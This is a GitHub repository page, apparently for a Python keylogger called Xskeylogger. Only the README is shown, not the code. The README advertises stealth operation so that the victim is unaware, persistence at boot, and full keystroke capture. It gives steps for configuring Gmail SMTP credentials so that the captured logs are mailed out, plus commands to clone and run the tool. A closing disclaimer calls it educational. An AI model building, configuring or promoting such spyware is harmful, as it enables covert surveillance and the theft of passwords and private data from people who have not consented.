Skip to content

A keylogger project in Python involves creating a program that silently records and logs keystrokes made by a user on a compute

Notifications You must be signed in to change notification settings

xcyberspy/Xskeylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 

Repository files navigation

Xskeylogger

This project is a simple yet powerful keylogger implemented in python. A keylogger also known as keystroke logging or keyboard capturing is the action of recording (logging) the keys struck on a keyboard typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. This keylogger captures keystrokes from the user's keyboard input providing a comprehensive record of all the keys pressed.

shields

shields

how to use🚀

  • Put your email gmail here sender_mail="youremail" in line: 22
  • Also in this recv_mail="youremail" in line: 23
  • Put the password smtp gmail:sender_password = "apppassword" in line: 24 ||this how to do it

GUI SOON:

Xskeylogger

🧐 Features

Here're some of the project's best features:

  • Stealth Mode: The keylogger operates silently in the background without the user's knowledge
  • Keystroke Logging: Captures all keyboard inputs including special keys function keys and alphanumeric characters
  • Persistence: Automatically starts capturing keystrokes upon system boot
  • Log File Generation: Stores captured keystrokes in a log file for later analysis
  • Customization: Easily customizable codebase to tailor the keylogger according to specific requirements

🛠️ Installation Steps:

1. Clone it:

git clone https://github.com/xcyberspy/keylogger.git

2. Run it

python key.py

💻 Built with

Technologies used in the project:

  • Vscode editor
  • Python

⚠️ Disclaimer:

Warning: This software is intended for educational and research purposes only. It should only be used on systems where you have explicit permission to monitor keystrokes. Misuse of this software may violate privacy laws.

🛡️ License:

This project is licensed under the This project is licensed under the [xcyberspy]

💖Like my work?

Buy Me A Coffee

About

A keylogger project in Python involves creating a program that silently records and logs keystrokes made by a user on a compute

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages